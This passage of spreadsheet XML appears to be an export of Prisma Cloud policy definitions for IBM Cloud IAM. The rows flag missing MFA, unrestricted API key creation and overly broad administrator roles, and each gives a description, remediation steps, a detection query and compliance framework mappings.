          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-iam-identity-account-setting' AND json.rule = restrict_create_platform_apikey does not equal "RESTRICTED"</t>
        </is>
      </c>
      <c r="AA3307" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3307" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3307" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-982</t>
        </is>
      </c>
      <c r="AD3307" t="b">
        <v>1</v>
      </c>
      <c r="AE3307" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3307" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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7" t="inlineStr">
        <is>
          <t>afc0e50a-e64a-45e6-8494-35d2fcd6fa40</t>
        </is>
      </c>
      <c r="AI3307" t="inlineStr">
        <is>
          <t>6fb09775-6f12-41c4-8900-c2651405fe75</t>
        </is>
      </c>
      <c r="AJ3307" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3307" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3308">
      <c r="A3308" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, TX-RAMP Level 1, TX-RAMP Level 1, CSA CCM v4.0.12, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, HITRUST CSF v.11.2.0, HITRUST CSF v.11.2.0, CIS v1.1.0 (IBM Cloud) Level 1, CRI Profile v2.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, SOC 2, ISO/IEC 27001:2022, Telecommunications Security Act - TSA, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, TX-RAMP Level 2, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, SOC 2, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HIPAA, TX-RAMP Level 1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2, CSA CCM v4.0.12, ITSG-33, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3308" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3308" s="2" t="inlineStr"/>
      <c r="D3308" t="inlineStr"/>
      <c r="E3308" t="inlineStr"/>
      <c r="F3308" t="inlineStr"/>
      <c r="G3308" t="b">
        <v>1</v>
      </c>
      <c r="H33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8" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3308" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3308" t="inlineStr">
        <is>
          <t>IBM Cloud Multi-Factor Authentication (MFA) not enabled at the account level</t>
        </is>
      </c>
      <c r="L3308" t="inlineStr"/>
      <c r="M3308" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3308" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3308" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3308" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3308" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R3308" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S3308" t="inlineStr"/>
      <c r="T3308" t="b">
        <v>0</v>
      </c>
      <c r="U3308" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3308" t="inlineStr">
        <is>
          <t>ibm-iam-identity-account-setting</t>
        </is>
      </c>
      <c r="W3308" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud accounts where Multi-Factor Authentication (MFA) is not enabled at the account level. MFA adds an extra layer of protection on top of your user name and password and helps protect accounts from stolen, phished, or weak password exploits. Enabling IBM MFA at the account level is the recommended approach to protect users.</t>
        </is>
      </c>
      <c r="X3308" t="inlineStr">
        <is>
          <t>Follow the below mentioned URL to enable IBM MFA:
https://cloud.ibm.com/docs/account?topic=account-enablemfa#enabling</t>
        </is>
      </c>
      <c r="Y3308" t="inlineStr"/>
      <c r="Z3308" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-iam-identity-account-setting' AND json.rule = mfa equal ignore case "NONE"</t>
        </is>
      </c>
      <c r="AA3308" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3308" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3308" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-980</t>
        </is>
      </c>
      <c r="AD3308" t="b">
        <v>1</v>
      </c>
      <c r="AE3308" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3308" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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8" t="inlineStr">
        <is>
          <t>7477b8e1-9814-4a12-a2f5-d5feaf1a327b</t>
        </is>
      </c>
      <c r="AI3308" t="inlineStr">
        <is>
          <t>8b1a41da-95f2-4613-af5c-f323b6882eb1</t>
        </is>
      </c>
      <c r="AJ3308" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3308" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3309">
      <c r="A3309" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, TX-RAMP Level 1, TX-RAMP Level 2, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3309" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3309" s="2" t="inlineStr"/>
      <c r="D3309" t="inlineStr"/>
      <c r="E3309" t="inlineStr"/>
      <c r="F3309" t="inlineStr"/>
      <c r="G3309" t="b">
        <v>1</v>
      </c>
      <c r="H33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09" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3309" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3309" t="inlineStr">
        <is>
          <t>IBM Cloud Service ID with IAM policies provide administrative privileges for Kubernetes Service</t>
        </is>
      </c>
      <c r="L3309" t="inlineStr"/>
      <c r="M3309" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3309" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3309" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3309" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3309" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3309" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3309" t="inlineStr"/>
      <c r="T3309" t="b">
        <v>0</v>
      </c>
      <c r="U3309" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3309" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3309" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Service IDs with overly permissive Kubernetes Administrative role. When a Service ID having a policy with admin rights gets compromised, the whole service gets compromised. As a security best practice, it is recommended to grant the least privileged access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3309" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', and click on 'Service IDs' in the left panel.
3. Select the Service ID which is reported and you want to edit access for.
4. Under the 'Access' tab, go to the 'Access policies' section, and click on the three dots on the right corner of a row for the policy which is having Administrator permission on 'Kubernetes Service'.
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3309" t="inlineStr"/>
      <c r="Z3309"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"containers-kubernetes" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resource","resourceGroupId","resourceType","serviceInstance","namespace"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "iam-ServiceId")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-service-id' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.id'; show Y;</t>
        </is>
      </c>
      <c r="AA3309" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3309" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3309" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1033</t>
        </is>
      </c>
      <c r="AD3309" t="b">
        <v>1</v>
      </c>
      <c r="AE3309" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3309" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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09" t="inlineStr">
        <is>
          <t>1ea78d16-e210-4d8a-82c0-149ee40ed186</t>
        </is>
      </c>
      <c r="AI3309" t="inlineStr">
        <is>
          <t>043874ad-f3a8-48b8-bb52-c0d8e201901c</t>
        </is>
      </c>
      <c r="AJ3309" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3309" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3310">
      <c r="A3310" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Telecommunications Security Act - TSA, TX-RAMP Level 2, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, TX-RAMP Level 1, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3310" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3310" s="2" t="inlineStr"/>
      <c r="D3310" t="inlineStr"/>
      <c r="E3310" t="inlineStr"/>
      <c r="F3310" t="inlineStr"/>
      <c r="G3310" t="b">
        <v>1</v>
      </c>
      <c r="H33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0" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3310" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3310" t="inlineStr">
        <is>
          <t>IBM Cloud user with IAM policies provide administrative privileges for Activity Tracker Service</t>
        </is>
      </c>
      <c r="L3310" t="inlineStr"/>
      <c r="M3310" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3310" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3310" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3310" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3310" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3310" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3310" t="inlineStr"/>
      <c r="T3310" t="b">
        <v>0</v>
      </c>
      <c r="U3310" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3310" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3310" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud users with overly permissive Activity Tracker Administrative role. When a user having policy with admin rights gets compromised, the whole service gets compromised. As a security best practice, it is recommended to grant the least privilege access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3310" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Users' in the left panel.
3. Select the user which is reported and you want to edit access for.
4. Go to 'Access' tab and under the 'Access policies' section, click on three dots on the right corner of a row for the policy which is having Administrator permission on 'IBM Cloud Activity Tracker ' Service.
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3310" t="inlineStr"/>
      <c r="Z3310"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"logdnaat" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resource","resourceGroupId","logGroup","resourceType","serviceInstance"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "IBMid")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-user' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3310" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3310" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3310" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1024</t>
        </is>
      </c>
      <c r="AD3310" t="b">
        <v>1</v>
      </c>
      <c r="AE3310" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3310" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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0" t="inlineStr">
        <is>
          <t>2531c05e-680f-4d91-acd0-751f4708c823</t>
        </is>
      </c>
      <c r="AI3310" t="inlineStr">
        <is>
          <t>fb301f90-9c21-4eaf-9544-3e34509262f0</t>
        </is>
      </c>
      <c r="AJ3310" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3310" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3311">
      <c r="A3311" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, SOC 2, TX-RAMP Level 2, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS v1.1.0 (IBM Cloud) Level 1, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3311" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3311" s="2" t="inlineStr"/>
      <c r="D3311" t="inlineStr"/>
      <c r="E3311" t="inlineStr"/>
      <c r="F3311" t="inlineStr"/>
      <c r="G3311" t="b">
        <v>1</v>
      </c>
      <c r="H33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1" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3311" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3311" t="inlineStr">
        <is>
          <t>IBM Cloud Service ID with IAM policies provide administrative privileges for Cloud object storage buckets</t>
        </is>
      </c>
      <c r="L3311" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3311" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3311" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3311" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3311" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3311" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3311" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3311" t="inlineStr"/>
      <c r="T3311" t="b">
        <v>0</v>
      </c>
      <c r="U3311" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3311" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3311" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Service ID, which has policy with administrator role permission for cloud object storage service. 
IBM Cloud Object Storage is a highly scalable, resilient, and secure managed data storage service on the IBM Cloud platform that offers an alternative to traditional block and file storage solutions. When a Service ID having a policy with admin rights on object storage gets compromised, the whole service gets compromised.
As a security best practice, it is recommended to grant the least privileged access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3311" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', and click on 'Service IDs' in the left panel.
3. Select the Service ID that is reported and that you want to edit access to.
4. Under the 'Access' tab, go to the 'Access policies' section and click on the three dots on the right corner of a row for the policy that has administrator permission on the 'IBM Cloud Object Storage' service.
5. Click on Remove or Edit to assign limited permission to the policy.
6. Review the policy details that you're about to edit or remove, and confirm by clicking Save or Remove.</t>
        </is>
      </c>
      <c r="Y3311" t="inlineStr"/>
      <c r="Z3311" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-iam-policy' AND json.rule = type equal ignore case "access" and roles[?any( role_id is member of ("crn:v1:bluemix:public:iam::::role:Administrator","crn:v1:bluemix:public:iam::::serviceRole:Manager") )] exists and resources[?any( attributes[?any( name equal ignore case "serviceName" and value equal ignore case "cloud-object-storage" and operator is member of ("stringEquals", "stringMatch"))] exists and (attributes[?any( name is member of ("resource","resourceGroupId","serviceInstance","prefix"))] does not exist or attributes[?any( name equal ignore case "resourceType" and value equal ignore case "bucket" )] exists ) )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "iam-ServiceId")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-service-id' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.id'; show Y;</t>
        </is>
      </c>
      <c r="AA3311" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3311" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3311" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1153</t>
        </is>
      </c>
      <c r="AD3311" t="b">
        <v>1</v>
      </c>
      <c r="AE3311" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3311" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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1" t="inlineStr">
        <is>
          <t>30f227cc-fbfa-49b3-808d-b309b53de1e6</t>
        </is>
      </c>
      <c r="AI3311" t="inlineStr">
        <is>
          <t>8dfcfa21-984c-4197-ad79-e1fc84c9cdc0</t>
        </is>
      </c>
      <c r="AJ3311" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3311" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3312">
      <c r="A3312" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Telecommunications Security Act - TSA, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, SOC 2, ISO/IEC 27001:2022, TX-RAMP Level 1, TX-RAMP Level 2, CSA CCM v4.0.12, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3312" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3312" s="2" t="inlineStr"/>
      <c r="D3312" t="inlineStr"/>
      <c r="E3312" t="inlineStr"/>
      <c r="F3312" t="inlineStr"/>
      <c r="G3312" t="b">
        <v>1</v>
      </c>
      <c r="H33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2" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3312" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3312" t="inlineStr">
        <is>
          <t>IBM Cloud Service ID with IAM policies provide administrative privileges for Databases for PostgreSQL service</t>
        </is>
      </c>
      <c r="L3312" t="inlineStr"/>
      <c r="M3312" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3312" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3312" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3312" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3312" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R3312" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S3312" t="inlineStr"/>
      <c r="T3312" t="b">
        <v>0</v>
      </c>
      <c r="U3312" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3312" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3312" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Service ID, which has policy with administrator role permission for 'Databases for PostgreSQL' service. Service ID has full platform control as an administrator for 'Databases for PostgreSQL' service, including the ability to assign other users access policies and modify deployment passwords. If a Service ID with administrator privilege becomes compromised, it may result in a compromised database. As a security best practice, it is advised to provide the least privilege access, such as allowing only the rights necessary to complete a task, instead of excessive permissions.</t>
        </is>
      </c>
      <c r="X3312" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Service IDs' in the left panel.
3. Select the Service ID which is reported and you want to edit access for.
4. Under the 'Access' tab, go to the 'Access policies' section &gt; Click on three dots on the right corner of a row for the policy, which has administrator permission on 'Databases for PostgreSQL' service.
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3312" t="inlineStr"/>
      <c r="Z3312"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"databases-for-postgresql" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resourceGroupId","serviceInstance"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "iam-ServiceId")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-service-id' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3312" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3312" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3312" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1038</t>
        </is>
      </c>
      <c r="AD3312" t="b">
        <v>1</v>
      </c>
      <c r="AE3312" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3312" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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2" t="inlineStr">
        <is>
          <t>e18759aa-b9f9-497a-91db-510288003df1</t>
        </is>
      </c>
      <c r="AI3312" t="inlineStr">
        <is>
          <t>b7525920-1ce9-4852-9c4d-696db26317a6</t>
        </is>
      </c>
      <c r="AJ3312" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3312" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3313">
      <c r="A3313" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, Microsoft Cloud Security Benchmark v1, ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, TX-RAMP Level 1, TX-RAMP Level 2, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, ITSG-33, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, ITSG-33, TX-RAMP Level 1, SOC 2, SOC 2, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, NIST 800-53 Rev 5, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B3313" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3313" s="2" t="inlineStr"/>
      <c r="D3313" t="inlineStr"/>
      <c r="E3313" t="inlineStr"/>
      <c r="F3313" t="inlineStr"/>
      <c r="G3313" t="b">
        <v>1</v>
      </c>
      <c r="H33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3" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3313" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3313" t="inlineStr">
        <is>
          <t>IBM Cloud user with IAM policies provide administrative privileges for Cloud Monitoring Service</t>
        </is>
      </c>
      <c r="L3313" t="inlineStr"/>
      <c r="M3313" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3313" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3313" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3313" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3313" t="inlineStr">
        <is>
          <t>IR</t>
        </is>
      </c>
      <c r="R3313" t="inlineStr">
        <is>
          <t>IR-05-00 : Incident Monitoring</t>
        </is>
      </c>
      <c r="S3313" t="inlineStr"/>
      <c r="T3313" t="b">
        <v>0</v>
      </c>
      <c r="U3313" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3313" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3313" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud users with overly permissive IBM Cloud Monitoring Administrative role. When a user having policy with admin rights gets compromised, the whole service gets compromised. As a security best practice, it is recommended to grant the least privilege access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3313" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Users' in the left panel.
3. Select the user which is reported and you want to edit access for.
4. Go to 'Access' tab and under the 'Access policies' section, click on three dots on the right corner of a row for the policy which is having Administrator permission on 'IBM Cloud Monitoring' service.
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove.</t>
        </is>
      </c>
      <c r="Y3313" t="inlineStr"/>
      <c r="Z3313"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"sysdig-monitor" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resource","resourceGroupId","resourceType","serviceInstance","sysdigTeam"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "IBMid")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-user' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3313" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3313" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3313" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1023</t>
        </is>
      </c>
      <c r="AD3313" t="b">
        <v>1</v>
      </c>
      <c r="AE3313" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3313" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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3" t="inlineStr">
        <is>
